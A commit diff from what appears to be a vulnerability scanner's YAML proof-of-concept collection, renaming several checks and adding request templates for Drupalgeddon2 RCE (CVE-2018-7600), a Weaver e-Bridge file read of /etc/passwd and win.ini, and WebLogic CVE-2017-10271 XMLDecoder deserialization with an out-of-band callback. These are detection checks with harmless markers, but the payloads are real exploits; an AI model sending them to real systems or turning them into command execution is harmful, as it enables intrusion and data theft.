migrate to poc groups (#960)

pocs/apacheofbiz-cve-2018-8033-xxe.yml → pocs/apache-ofbiz-cve-2018-8033-xxe.yml

@@ -1,4 +1,4 @@
-name: poc-yaml-apacheofbiz-cve-2018-8033-xxe
+name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe
 rules:
   - method: POST
     path: /webtools/control/xmlrpc

pocs/drupal-geddon-cve-2014-3704-sqli.yml → pocs/drupal-cve-2014-3704-sqli.yml

@@ -1,4 +1,4 @@
-name: poc-yaml-drupalgeddon-cve-2014-3704-sqli  # nolint[:namematch]
+name: poc-yaml-drupal-cve-2014-3704-sqli
 rules:
   - method: POST
     path: /?q=node&destination=node

pocs/drupal-cve-2018-7600-rce.yml

@@ -0,0 +1,39 @@
+name: poc-yaml-drupal-cve-2018-7600-rce
+set:
+  r1: randomLowercase(4)
+  r2: randomLowercase(4)
+groups:
+  drupal8:
+    - method: POST
+      path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+      headers:
+        Content-Type: application/x-www-form-urlencoded
+      body: |
+        form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
+      expression: |
+        response.body.bcontains(bytes(r1 + "%" + r2))
+  drupal7:
+    - method: POST
+      path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
+      headers:
+        Content-Type: application/x-www-form-urlencoded
+      body: |
+        form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
+      search: |
+        name="form_build_id"\s+value="(?P<build_id>.+?)"
+      expression: |
+        response.status == 200
+    - method: POST
+      path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
+      headers:
+        Content-Type: application/x-www-form-urlencoded
+      body: |
+        form_build_id={{build_id}}
+      expression: |
+        response.body.bcontains(bytes(r1 + "%" + r2))
+detail:
+  links:
+    - https://github.com/dreadlocked/Drupalgeddon2
+    - https://paper.seebug.org/567/
+test:
+  target: http://cve-2018-7600-8-x.vulnet:8080/

pocs/phpstudy-nginx-wrong-resolve.yml

@@ -1,30 +1,56 @@
 name: poc-yaml-phpstudy-nginx-wrong-resolve
 set:
   name: randomInt(10000000, 99999999)
-rules:
-  - method: GET
-    path: /{{name}}.php
-    follow_redirects: false
-    expression: |
-      response.status != 200
+groups:
+  html:
+    - method: GET
+      path: /{{name}}.php
+      follow_redirects: false
+      expression: |
+        response.status != 200
 
-  - method: GET
-    path: /index.html
-    follow_redirects: false
-    expression: |
-      response.status == 200 && response.headers["Server"].contains("nginx")
+    - method: GET
+      path: /index.html
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.headers["Server"].contains("nginx")
 
-  - method: GET
-    path: /index.html/.php
-    follow_redirects: false
-    expression: |
-      response.status == 200 && response.headers["Server"].contains("nginx")
+    - method: GET
+      path: /index.html/.php
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.headers["Server"].contains("nginx")
 
-  - method: GET
-    path: /index.html/.xxx
-    follow_redirects: false
-    expression: |
-      response.status != 200
+    - method: GET
+      path: /index.html/.xxx
+      follow_redirects: false
+      expression: |
+        response.status != 200
+
+  php:
+    - method: GET
+      path: /{{name}}.php
+      follow_redirects: false
+      expression: |
+        response.status != 200
+
+    - method: GET
+      path: /index.php
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.headers["Server"].contains("nginx")
+
+    - method: GET
+      path: /index.php/.php
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.headers["Server"].contains("nginx")
+
+    - method: GET
+      path: /index.php/.xxx
+      follow_redirects: false
+      expression: |
+        response.status != 200
 detail:
   author: LoRexxar(https://lorexxar.cn),0h1in9e(https://www.ohlinge.cn)
   links:

pocs/spark-api-unauth.yml

@@ -1,4 +1,4 @@
-name: poc-yaml-spark-unauth  # nolint[:namematch]
+name: poc-yaml-spark-api-unauth
 rules:
   - method: GET
     path: /v1/submissions

pocs/spark-webui-unauth.yml

@@ -1,4 +1,4 @@
-name: poc-yaml-spark-unauth  # nolint[:namematch]
+name: poc-yaml-spark-webui-unauth
 rules:
   - method: GET
     path: /

pocs/weaver-ebridge-file-read.yml

@@ -0,0 +1,34 @@
+name: poc-yaml-weaver-ebridge-file-read
+groups:
+  linux:
+    - method: GET
+      path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id")
+      search: |
+        \"id\"\:\"(?P<var>.+?)\"\,
+    - method: GET
+      path: "/file/fileNoLogin/{{var}}"
+      follow_redirects: false
+      expression: |
+        response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+
+  windows:
+    - method: GET
+      path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id")
+      search: |
+        \"id\"\:\"(?P<var>.+?)\"\,
+    - method: GET
+      path: /file/fileNoLogin/{{var}}
+      follow_redirects: false
+      expression: |
+        response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
+detail:
+  author: mvhz81
+  info: e-bridge-file-read for Linux
+  links:
+    - https://mrxn.net/Infiltration/323.html

pocs/weblogic-cve-2017-10271.yml

@@ -0,0 +1,34 @@
+name: poc-yaml-weblogic-cve-2017-10271
+set:
+  reverse: newReverse()
+  reverseURL: reverse.url
+groups:
+  reverse:
+    - method: POST
+      path: /wls-wsat/CoordinatorPortType
+      headers:
+        Content-Type: text/xml
+      body: >-
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">  <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  <java> <void class="java.net.URL"> <string>{{reverseURL}}</string> <void method="openConnection"><void method="getInputStream"/></void></void></java> </work:WorkContext> </soapenv:Header>  <soapenv:Body/> </soapenv:Envelope>
+      follow_redirects: true
+      expression: >
+        reverse.wait(5)
+
+  echo:
+    - method: POST
+      path: /wls-wsat/CoordinatorPortType
+      headers:
+        Content-Type: text/xml
+      body: >-
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork"><void method="getResponse"><void method="getServletOutputStream"><void method="write"><array class="byte" length="9"><void index="0"><byte>50</byte></void><void index="1"><byte>50</byte></void><void index="2"><byte>53</byte></void><void index="3"><byte>55</byte></void><void index="4"><byte>55</byte></void><void index="5"><byte>51</byte></void><void index="6"><byte>48</byte></void><void index="7"><byte>57</byte></void><void index="8"><byte>49</byte></void></array></void><void method="flush"/></void></void></void></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope></soapenv:Envelope>
+      follow_redirects: true
+      expression: >
+        response.body.bcontains(b"225773091")
+detail:
+  vulnpath: "/wls-wsat/CoordinatorPortType"
+  author: fnmsd(https://github.com/fnmsd)
+  description: "Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2017-10271"
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
+    - https://github.com/QAX-A-Team/WeblogicEnvironment
+    - https://xz.aliyun.com/t/5299